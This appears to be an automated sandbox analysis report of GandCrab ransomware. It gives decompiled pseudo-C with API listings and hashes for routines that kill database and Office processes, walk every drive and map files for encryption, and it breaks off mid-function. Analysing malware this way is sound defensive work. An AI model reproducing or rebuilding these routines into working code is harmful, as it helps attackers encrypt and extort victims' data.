                                        • Instruction ID: 223ed9f4fdf2b1c67bcc8898d83174796d0f3b6891c94885c78c505186383b75
                                        • Opcode Fuzzy Hash: 88e0d11951383276035ca72d3f631ed8fe3de7c76dbd2aee08c05eca70f6a8ca
                                        • Instruction Fuzzy Hash: 35F030327C632177F13116655C0FF072D2C9B85F2AF398004F709BE1C389E8656086A9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 98%
                                        			E0F9D46F0() {
                                        				char* _v12;
                                        				char* _v16;
                                        				char* _v20;
                                        				char* _v24;
                                        				char* _v28;
                                        				char* _v32;
                                        				char* _v36;
                                        				char* _v40;
                                        				char* _v44;
                                        				char* _v48;
                                        				char* _v52;
                                        				char* _v56;
                                        				char* _v60;
                                        				char* _v64;
                                        				char* _v68;
                                        				char* _v72;
                                        				char* _v76;
                                        				char* _v80;
                                        				char* _v84;
                                        				char* _v88;
                                        				char* _v92;
                                        				char* _v96;
                                        				char* _v100;
                                        				char* _v104;
                                        				char* _v108;
                                        				char* _v112;
                                        				char* _v116;
                                        				char* _v120;
                                        				char* _v124;
                                        				char* _v128;
                                        				char* _v132;
                                        				char* _v136;
                                        				char* _v140;
                                        				char* _v144;
                                        				char* _v148;
                                        				char* _v152;
                                        				char* _v156;
                                        				char* _v160;
                                        				char* _v164;
                                        				void* _v172;
                                        				int _t51;
                                        				int _t52;
                                        				void* _t60;
                                        				WCHAR* _t62;
                                        				void* _t65;
                                        				void* _t70;
                                        				signed int _t71;
                                        				void* _t72;
                                        				signed int _t74;
                                        				void* _t76;
                                        
                                        				_t76 = (_t74 & 0xfffffff8) - 0xa4;
                                        				_v164 = L"msftesql.exe";
                                        				_v160 = L"sqlagent.exe";
                                        				_v156 = L"sqlbrowser.exe";
                                        				_v152 = L"sqlservr.exe";
                                        				_v148 = L"sqlwriter.exe";
                                        				_v144 = L"oracle.exe";
                                        				_v140 = L"ocssd.exe";
                                        				_v136 = L"dbsnmp.exe";
                                        				_v132 = L"synctime.exe";
                                        				_v128 = L"mydesktopqos.exe";
                                        				_v124 = L"agntsvc.exeisqlplussvc.exe";
                                        				_v120 = L"xfssvccon.exe";
                                        				_v116 = L"mydesktopservice.exe";
                                        				_v112 = L"ocautoupds.exe";
                                        				_v108 = L"agntsvc.exeagntsvc.exe";
                                        				_v104 = L"agntsvc.exeencsvc.exe";
                                        				_v100 = L"firefoxconfig.exe";
                                        				_v96 = L"tbirdconfig.exe";
                                        				_v92 = L"ocomm.exe";
                                        				_v88 = L"mysqld.exe";
                                        				_v84 = L"mysqld-nt.exe";
                                        				_v80 = L"mysqld-opt.exe";
                                        				_v76 = L"dbeng50.exe";
                                        				_v72 = L"sqbcoreservice.exe";
                                        				_v68 = L"excel.exe";
                                        				_v64 = L"infopath.exe";
                                        				_v60 = L"msaccess.exe";
                                        				_v56 = L"mspub.exe";
                                        				_v52 = L"onenote.exe";
                                        				_v48 = L"outlook.exe";
                                        				_v44 = L"powerpnt.exe";
                                        				_v40 = L"steam.exe";
                                        				_v36 = L"sqlservr.exe";
                                        				_v32 = L"thebat.exe";
                                        				_v28 = L"thebat64.exe";
                                        				_v24 = L"thunderbird.exe";
                                        				_v20 = L"visio.exe";
                                        				_v16 = L"winword.exe";
                                        				_v12 = L"wordpad.exe";
                                        				_t70 = CreateToolhelp32Snapshot(2, 0);
                                        				_v172 = _t70;
                                        				_t60 = VirtualAlloc(0, 0x22c, 0x3000, 4);
                                        				if(_t60 != 0) {
                                        					 *_t60 = 0x22c;
                                        					if(_t70 != 0xffffffff) {
                                        						_push(_t60);
                                        						Process32FirstW(_t70);
                                        					}
                                        				}
                                        				_t41 = _t60 + 0x24; // 0x24
                                        				_t62 = _t41;
                                        				do {
                                        					_t71 = 0;
                                        					do {
                                        						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
                                        						if(_t51 == 0) {
                                        							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
                                        							if(_t65 != 0) {
                                        								TerminateProcess(_t65, 0);
                                        								CloseHandle(_t65);
                                        							}
                                        						}
                                        						_t71 = _t71 + 1;
                                        						_t46 = _t60 + 0x24; // 0x24
                                        						_t62 = _t46;
                                        					} while (_t71 < 0x27);
                                        					_t72 = _v172;
                                        					_t52 = Process32NextW(_t72, _t60);
                                        					_t48 = _t60 + 0x24; // 0x24
                                        					_t62 = _t48;
                                        				} while (_t52 != 0);
                                        				if(_t60 != 0) {
                                        					VirtualFree(_t60, 0, 0x8000);
                                        				}
                                        				return CloseHandle(_t72);
                                        			}
                                        Instruction addresses: 0x0f9d46f6 0x0f9d4703 0x0f9d470b 0x0f9d4713 0x0f9d471b 0x0f9d4723 0x0f9d472b 0x0f9d4733 0x0f9d473b 0x0f9d4743 0x0f9d474b 0x0f9d4753 0x0f9d475b 0x0f9d4763 0x0f9d476b 0x0f9d4773 0x0f9d477b 0x0f9d4783 0x0f9d478b 0x0f9d4793 0x0f9d479b 0x0f9d47a3 0x0f9d47ab 0x0f9d47b3 0x0f9d47bb 0x0f9d47c3 0x0f9d47cb 0x0f9d47d3 0x0f9d47de 0x0f9d47e9 0x0f9d47f4 0x0f9d47ff 0x0f9d480a 0x0f9d4815 0x0f9d4820 0x0f9d482b 0x0f9d4836 0x0f9d4841 0x0f9d484c 0x0f9d4857 0x0f9d4874 0x0f9d4878 0x0f9d4882 0x0f9d4886 0x0f9d4888 0x0f9d4891 0x0f9d4893 0x0f9d4895 0x0f9d4895 0x0f9d4891 0x0f9d48a1 0x0f9d48a1 0x0f9d48a4 0x0f9d48a4 0x0f9d48b0 0x0f9d48b5 0x0f9d48bd 0x0f9d48cb 0x0f9d48cf 0x0f9d48d4 0x0f9d48e1 0x0f9d48e1 0x0f9d48cf 0x0f9d48eb 0x0f9d48ec 0x0f9d48ec 0x0f9d48ef 0x0f9d48f4 0x0f9d48fa 0x0f9d4900 0x0f9d4900 0x0f9d4903 0x0f9d4909 0x0f9d4913 0x0f9d4913 0x0f9d4922

                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0F9D4862
                                        • VirtualAlloc.KERNEL32(00000000,0000022C,00003000,00000004), ref: 0F9D487C
                                        • Process32FirstW.KERNEL32(00000000,00000000), ref: 0F9D4895
                                        • lstrcmpiW.KERNEL32(00000002,00000024), ref: 0F9D48B5
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0F9D48C5
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0F9D48D4
                                        • CloseHandle.KERNEL32(00000000), ref: 0F9D48E1
                                        • Process32NextW.KERNEL32(?,00000000), ref: 0F9D48FA
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D4913
                                        • CloseHandle.KERNEL32(?), ref: 0F9D491A
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcessProcess32Virtual$AllocCreateFirstFreeNextOpenSnapshotTerminateToolhelp32lstrcmpi
                                        • String ID:
                                        • API String ID: 3586910739-0
                                        • Opcode ID: 0a5af32f8358616a82d5ff002e8cd54016a2d25783bc7eea241d44a294886b9a
                                        • Instruction ID: 622c47e7eb27b7a4fbf34b5b108a8eb5cf91bffc6efc84e014208d04cd5bcbec
                                        • Opcode Fuzzy Hash: 0a5af32f8358616a82d5ff002e8cd54016a2d25783bc7eea241d44a294886b9a
                                        • Instruction Fuzzy Hash: FC5158B41093849FD7208F14984A75ABBE8BB8271CF70C91CF59A5B2D2C7788919CF96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E0F9D2C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                        				struct tagPAINTSTRUCT _v68;
                                        				struct tagPAINTSTRUCT _v88;
                                        				short _v100;
                                        				intOrPtr _t13;
                                        				void* _t15;
                                        				struct HDC__* _t21;
                                        				int _t30;
                                        
                                        				_t13 =  *0xf9df290; // 0x21
                                        				asm("movdqu xmm0, [0xf9df280]");
                                        				_t30 = _a8;
                                        				_v88.fErase = _t13;
                                        				asm("movdqu [esp+0x10], xmm0");
                                        				_t15 = _t30 - 2;
                                        				if(_t15 == 0) {
                                        					CreateThread(0, 0, E0F9D2AD0, 0, 0, 0);
                                        					DestroyWindow(_a4);
                                        					return 0xdeadbeef;
                                        				} else {
                                        					if(_t15 == 0xd) {
                                        						_t21 = BeginPaint(_a4,  &_v68);
                                        						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
                                        						EndPaint(_a4,  &_v88);
                                        						return 0;
                                        					} else {
                                        						return DefWindowProcW(_a4, _t30, _a12, _a16);
                                        					}
                                        				}
                                        			}
                                        Instruction addresses: 0x0f9d2c59 0x0f9d2c5e 0x0f9d2c66 0x0f9d2c69 0x0f9d2c70 0x0f9d2c76 0x0f9d2c79 0x0f9d2ce9 0x0f9d2cf2 0x0f9d2d01 0x0f9d2c7b 0x0f9d2c7e 0x0f9d2c9f 0x0f9d2cbd 0x0f9d2ccb 0x0f9d2cd7 0x0f9d2c80 0x0f9d2c94 0x0f9d2c94 0x0f9d2c7e

                                        APIs
                                        • DefWindowProcW.USER32(?,?,?,?), ref: 0F9D2C8A
                                        • BeginPaint.USER32(?,?), ref: 0F9D2C9F
                                        • lstrlenW.KERNEL32(?), ref: 0F9D2CAC
                                        • TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 0F9D2CBD
                                        • EndPaint.USER32(?,?), ref: 0F9D2CCB
                                        • CreateThread.KERNEL32 ref: 0F9D2CE9
                                        • DestroyWindow.USER32(?), ref: 0F9D2CF2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
                                        • String ID: GandCrab!
                                        • API String ID: 572880375-2223329875
                                        • Opcode ID: 37131f888b245359eec163c406be56ffa05b4ec09fdb5c0783ae18a439822bf6
                                        • Instruction ID: 5335b077f8efd42d98b3f5f631aed1602a0c00fb5ca3b4ea69f0767a9b87d3e7
                                        • Opcode Fuzzy Hash: 37131f888b245359eec163c406be56ffa05b4ec09fdb5c0783ae18a439822bf6
                                        • Instruction Fuzzy Hash: 5B11C832109309AFE721DF64DC0AFAA7B6CFB49322F104616FE41D6191E7719970CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E0F9D3E20(struct _SECURITY_ATTRIBUTES* __ecx) {
                                        				char _v612;
                                        				char _v644;
                                        				void* _v908;
                                        				void* _v912;
                                        				intOrPtr _v916;
                                        				intOrPtr _v920;
                                        				short _v924;
                                        				signed int _v928;
                                        				void* _v932;
                                        				void* _v936;
                                        				intOrPtr _v940;
                                        				intOrPtr _v944;
                                        				intOrPtr _v948;
                                        				long _v952;
                                        				struct _SECURITY_ATTRIBUTES* _v956;
                                        				struct _SECURITY_ATTRIBUTES* _v960;
                                        				struct _SECURITY_ATTRIBUTES* _v964;
                                        				char _v968;
                                        				void* _t67;
                                        				short _t68;
                                        				intOrPtr _t69;
                                        				int _t72;
                                        				long _t75;
                                        				signed int _t77;
                                        				signed int _t80;
                                        				intOrPtr* _t82;
                                        				void* _t84;
                                        				struct _SECURITY_ATTRIBUTES* _t87;
                                        				long _t88;
                                        				intOrPtr _t89;
                                        				intOrPtr _t92;
                                        				intOrPtr _t95;
                                        				char _t101;
                                        				intOrPtr _t106;
                                        				void _t110;
                                        				struct _SECURITY_ATTRIBUTES** _t114;
                                        				intOrPtr _t115;
                                        				signed int _t119;
                                        				void* _t121;
                                        
                                        				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
                                        				_t87 = __ecx;
                                        				_v964 = __ecx;
                                        				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
                                        				 *((intOrPtr*)(_t67 + 4)) = _t87;
                                        				_t88 = 0;
                                        				 *_t67 = 0x43;
                                        				_t68 =  *L"?:\\"; // 0x3a003f
                                        				_v924 = _t68;
                                        				_t69 =  *0xf9df348; // 0x5c
                                        				_v920 = _t69;
                                        				_v968 = GetTickCount();
                                        				_t114 =  &_v644;
                                        				_t110 = 0x41;
                                        				do {
                                        					_v924 = _t110;
                                        					_t72 = GetDriveTypeW( &_v924);
                                        					if(_t72 >= 2 && _t72 != 5) {
                                        						 *((intOrPtr*)(_t114 - 4)) = _v964;
                                        						_t84 = _t114 - 8;
                                        						 *_t84 = _t110;
                                        						 *_t114 = 0;
                                        						_t114[2] = 0;
                                        						_t114[3] = 0;
                                        						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E0F9D6DE0, _t84, 0, 0);
                                        						_t88 = _t88 + 1;
                                        						_t114 =  &(_t114[6]);
                                        					}
                                        					_t110 = _t110 + 1;
                                        				} while (_t110 <= 0x5a);
                                        				_v952 = _t88;
                                        				asm("xorps xmm0, xmm0");
                                        				_v956 = 0;
                                        				_v960 = 0;
                                        				asm("movlpd [esp+0x38], xmm0");
                                        				asm("movlpd [esp+0x30], xmm0");
                                        				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
                                        				_t75 = GetTickCount();
                                        				asm("xorps xmm0, xmm0");
                                        				_t115 = _v948;
                                        				_v932 = _t75 - _v968;
                                        				_t77 = 0;
                                        				_v964 = 0;
                                        				asm("movlpd [esp+0x40], xmm0");
                                        				if(_t88 < 2) {
                                        					_t95 = _v940;
                                        					_t106 = _v944;
                                        				} else {
                                        					_t26 = _t88 - 2; // -1
                                        					_t92 = _v940;
                                        					_t82 =  &_v612;
                                        					_t101 = (_t26 >> 1) + 1;
                                        					_v968 = _t101;
                                        					_v928 = _t101 + _t101;
                                        					_t106 = _v944;
                                        					do {
                                        						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
                                        						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
                                        						asm("adc edi, [eax-0x14]");
                                        						_t115 = _t115 +  *_t82;
                                        						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
                                        						asm("adc edx, [eax+0x4]");
                                        						_t82 = _t82 + 0x30;
                                        						_t41 =  &_v968;
                                        						 *_t41 = _v968 - 1;
                                        					} while ( *_t41 != 0);
                                        					_t77 = _v928;
                                        					_v968 = _t92;
                                        					_t88 = _v952;
                                        					_t95 = _v968;
                                        				}
                                        				if(_t77 >= _t88) {
                                        					_t89 = _v916;
                                        				} else {
                                        					_t80 = _t77 + _t77 * 2;
                                        					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
                                        					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
                                        				}
                                        				asm("adc edx, edi");
                                        				asm("adc edx, eax");
                                        				return E0F9D5670(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
                                        			}
                                        Instruction addresses: 0x0f9d3e26 0x0f9d3e38 0x0f9d3e3c 0x0f9d3e40 0x0f9d3e4b 0x0f9d3e4e 0x0f9d3e50 0x0f9d3e53 0x0f9d3e58 0x0f9d3e5c 0x0f9d3e61 0x0f9d3e6b 0x0f9d3e6f 0x0f9d3e76 0x0f9d3e80 0x0f9d3e84 0x0f9d3e8a 0x0f9d3e93 0x0f9d3ea2 0x0f9d3ea5 0x0f9d3eb2 0x0f9d3eb5 0x0f9d3ebb 0x0f9d3ec2 0x0f9d3ecf 0x0f9d3ed3 0x0f9d3ed4 0x0f9d3ed4 0x0f9d3ed7 0x0f9d3ed8 0x0f9d3ee6 0x0f9d3eea 0x0f9d3eed 0x0f9d3ef7 0x0f9d3eff 0x0f9d3f05 0x0f9d3f0b 0x0f9d3f11 0x0f9d3f1b 0x0f9d3f22 0x0f9d3f26 0x0f9d3f2a 0x0f9d3f2c 0x0f9d3f34 0x0f9d3f3d
                                        0x0f9d3f9c
                                        0x0f9d3fa0
                                        0x0f9d3f3f
                                        0x0f9d3f3f
                                        0x0f9d3f42
                                        0x0f9d3f48
                                        0x0f9d3f4f
                                        0x0f9d3f50
                                        0x0f9d3f57
                                        0x0f9d3f5b
                                        0x0f9d3f60
                                        0x0f9d3f67
                                        0x0f9d3f6a
                                        0x0f9d3f6e
                                        0x0f9d3f78
                                        0x0f9d3f7a
                                        0x0f9d3f7e
                                        0x0f9d3f81
                                        0x0f9d3f84
                                        0x0f9d3f84
                                        0x0f9d3f84
                                        0x0f9d3f8a
                                        0x0f9d3f8e
                                        0x0f9d3f92
                                        0x0f9d3f96
                                        0x0f9d3f96
                                        0x0f9d3fa6
                                        0x0f9d3fca
                                        0x0f9d3fa8
                                        0x0f9d3fa8
                                        0x0f9d3fb2
                                        0x0f9d3fb6
                                        0x0f9d3fbd
                                        0x0f9d3fd4
                                        0x0f9d3fd8
                                        0x0f9d3ff6

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 0F9D3E40
                                        • GetTickCount.KERNEL32 ref: 0F9D3E65
                                        • GetDriveTypeW.KERNEL32(?), ref: 0F9D3E8A
                                        • CreateThread.KERNEL32 ref: 0F9D3EC9
                                        • WaitForMultipleObjects.KERNEL32(00000000,?), ref: 0F9D3F0B
                                        • GetTickCount.KERNEL32 ref: 0F9D3F11
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
                                        • String ID: ?:\
                                        • API String ID: 458387131-2533537817
                                        • Opcode ID: 3a4fa261f6d0bd4c2573b3026b0b23293ec2b0217c32a9afa2f6273347b0dd7d
                                        • Instruction ID: e9248d09911c0c3f7bf8714baa41f22062386ceb83a21cd3c161bb01fd57d192
                                        • Opcode Fuzzy Hash: 3a4fa261f6d0bd4c2573b3026b0b23293ec2b0217c32a9afa2f6273347b0dd7d
                                        • Instruction Fuzzy Hash: D05136709093009FD310CF18D888B5AFBE5FF89325F608A2DF58997391D375A954CB96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0F9D6DE0(void* _a4) {
                                        				intOrPtr _v0;
                                        				intOrPtr _v4;
                                        				long _v8;
                                        				intOrPtr _v12;
                                        				void* _v16;
                                        				struct _CRITICAL_SECTION _v40;
                                        				WCHAR* _t12;
                                        				void* _t22;
                                        
                                        				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
                                        				_t22 = _a4;
                                        				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
                                        				InitializeCriticalSection( &_v40);
                                        				_v12 = 0x2710;
                                        				_v8 = 0;
                                        				_v4 = 0xffffffff;
                                        				_v0 = 0xffffffff;
                                        				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
                                        				E0F9D6C90(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
                                        				VirtualFree(_t22, 0, 0x8000);
                                        				ExitThread(0);
                                        			}

                                        0x0f9d6df9
                                        0x0f9d6dff
                                        0x0f9d6e0e
                                        0x0f9d6e1c
                                        0x0f9d6e30
                                        0x0f9d6e38
                                        0x0f9d6e40
                                        0x0f9d6e48
                                        0x0f9d6e56
                                        0x0f9d6e6b
                                        0x0f9d6e7b
                                        0x0f9d6e83

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 0F9D6DF9
                                        • wsprintfW.USER32 ref: 0F9D6E0E
                                        • InitializeCriticalSection.KERNEL32(?), ref: 0F9D6E1C
                                        • VirtualAlloc.KERNEL32 ref: 0F9D6E50
                                          • Part of subcall function 0F9D6C90: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F9D6CC3
                                          • Part of subcall function 0F9D6C90: lstrcatW.KERNEL32(00000000,0F9DFEC4), ref: 0F9D6CDB
                                          • Part of subcall function 0F9D6C90: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F9D6CE5
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 0F9D6E7B
                                        • ExitThread.KERNEL32 ref: 0F9D6E83
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
                                        • String ID: %c:\
                                        • API String ID: 1988002015-3142399695
                                        • Opcode ID: 2ee79f82eab171010b92a82065b94d47a2caada3147338485a49379818dd1f3f
                                        • Instruction ID: cd403c33321bfe05b1f8e858b5b953a9e64edd3393160eb5cd269fb2108d0eea
                                        • Opcode Fuzzy Hash: 2ee79f82eab171010b92a82065b94d47a2caada3147338485a49379818dd1f3f
                                        • Instruction Fuzzy Hash: 5101C4B5148300BBE3209F24CC8AF163BACAB45B21F204604FB659A1C2D7B89564CB59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 85%
                                        			E0F9D2890(WCHAR* __ecx, intOrPtr __edx) {
                                        				long _v8;
                                        				intOrPtr _v12;
                                        				void* _v16;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t14;
                                        				void* _t18;
                                        				void* _t23;
                                        				WCHAR* _t29;
                                        				void* _t34;
                                        				signed int _t35;
                                        				long _t37;
                                        				void* _t38;
                                        				void* _t40;
                                        
                                        				_t29 = __ecx;
                                        				_t28 = 0;
                                        				_v12 = __edx;
                                        				_t34 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
                                        				if(_t34 == 0xffffffff) {
                                        					L3:
                                        					return 0;
                                        				} else {
                                        					_v8 = GetFileSize(_t34, 0);
                                        					E0F9D3030(0, _t34, _t35);
                                        					asm("sbb esi, esi");
                                        					_t37 = (_t35 & 0x00000003) + 1;
                                        					_t14 = E0F9D3030(0, _t34, _t37);
                                        					asm("sbb eax, eax");
                                        					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0);
                                        					_v16 = _t18;
                                        					if(_t18 != 0) {
                                        						_t38 = MapViewOfFile(_t18, _t37, 0, 0, 0);
                                        						if(_t38 != 0) {
                                        							_t23 = E0F9D3030(0, _t34, _t38);
                                        							if(_t23 == 0) {
                                        								_push(_t29);
                                        								_t4 = _t38 + 0x53; // 0x53
                                        								_t29 = _t4;
                                        								_t5 = _t23 + 6; // 0x6
                                        								E0F9D82A0(_t29, _t5);
                                        								_t40 = _t40 + 4;
                                        							}
                                        							_push(_t29);
                                        							_t28 = E0F9D2830(_v12, _t38, _v8);
                                        							UnmapViewOfFile(_t38);
                                        						}
                                        						CloseHandle(_v16);
                                        						CloseHandle(_t34);
                                        						return _t28;
                                        					} else {
                                        						CloseHandle(_t34);
                                        						goto L3;
                                        					}
                                        				}
                                        			}

                                        0x0f9d2890
                                        0x0f9d2899
                                        0x0f9d289b
                                        0x0f9d28b1
                                        0x0f9d28b6
                                        0x0f9d28f9
                                        0x0f9d2901
                                        0x0f9d28b8
                                        0x0f9d28c0
                                        0x0f9d28c3
                                        0x0f9d28ca
                                        0x0f9d28cf
                                        0x0f9d28d0
                                        0x0f9d28d8
                                        0x0f9d28e5
                                        0x0f9d28eb
                                        0x0f9d28f0
                                        0x0f9d2910
                                        0x0f9d2914
                                        0x0f9d2916
                                        0x0f9d291d
                                        0x0f9d291f
                                        0x0f9d2920
                                        0x0f9d2920
                                        0x0f9d2923
                                        0x0f9d2926
                                        0x0f9d292b
                                        0x0f9d292b
                                        0x0f9d292e
                                        0x0f9d293f
                                        0x0f9d2942
                                        0x0f9d2942
                                        0x0f9d2951
                                        0x0f9d2954
                                        0x0f9d295e
                                        0x0f9d28f2
                                        0x0f9d28f3
                                        0x00000000
                                        0x0f9d28f3
                                        0x0f9d28f0

                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,74CF82B0,00000000,?,?,0F9D2C02), ref: 0F9D28AB
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,0F9D2C02), ref: 0F9D28BA
                                        • CreateFileMappingW.KERNEL32(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,0F9D2C02), ref: 0F9D28E5
                                        • CloseHandle.KERNEL32(00000000,?,?,0F9D2C02), ref: 0F9D28F3
                                        • MapViewOfFile.KERNEL32(00000000,74CF82B1,00000000,00000000,00000000,?,?,0F9D2C02), ref: 0F9D290A
                                        • UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,0F9D2C02), ref: 0F9D2942
                                        • CloseHandle.KERNEL32(?,?,?,0F9D2C02), ref: 0F9D2951
                                        • CloseHandle.KERNEL32(00000000,?,?,0F9D2C02), ref: 0F9D2954
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseHandle$CreateView$MappingSizeUnmap
                                        • String ID:
                                        • API String ID: 265113797-0
                                        • Opcode ID: 8e576b455ec9157ecf32e980671fc580164067d028ea1d5d72608e5930a0fb66
                                        • Instruction ID: 822f489a2f8fbf4dac1b4ed45c13d4a9ab873360c6d5d64cc8e4a0219f41615f
                                        • Opcode Fuzzy Hash: 8e576b455ec9157ecf32e980671fc580164067d028ea1d5d72608e5930a0fb66
                                        • Instruction Fuzzy Hash: BE213871A012197FE3206BB49C85F7F776CDB85676F308224FD01E32C2E6389C2149A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 97%
                                        			E0F9D6850(WCHAR* __ecx) {
                                        				intOrPtr _v8;
                                        				signed int _t11;
                                        				void* _t20;
                                        				void* _t23;
                                        				signed int _t26;
                                        				signed int _t27;
                                        				intOrPtr _t28;
                                        				void* _t31;
                                        				signed short* _t35;
                                        				WCHAR* _t38;
                                        				WCHAR* _t40;
                                        				void* _t44;
                                        
                                        				_push(__ecx);
                                        				_t38 = __ecx;
                                        				if( *0xf9e2a60 != 0) {
                                        					_t11 = lstrlenW(__ecx);
                                        					_t40 = _t38 + _t11 * 2 + 0xfffffffe;
                                        					if(_t11 == 0) {
                                        						L7:
                                        						return 1;
                                        					} else {
                                        						while( *_t40 != 0x2e) {
                                        							_t40 = _t40 - 2;
                                        							_t11 = _t11 - 1;
                                        							if(_t11 != 0) {
                                        								continue;
                                        							}
                                        							break;
                                        						}
                                        						if(_t11 != 0) {
                                        							_t23 = VirtualAlloc(0, 4 + lstrlenW(_t40) * 2, 0x3000, 4);
                                        							wsprintfW(_t23, L"%s ", _t40);
                                        							_t35 =  *0xf9e2a60; // 0x0
                                        							_t28 = 0;
                                        							_v8 = 0;
                                        							if( *_t23 == 0) {
                                        								L20:
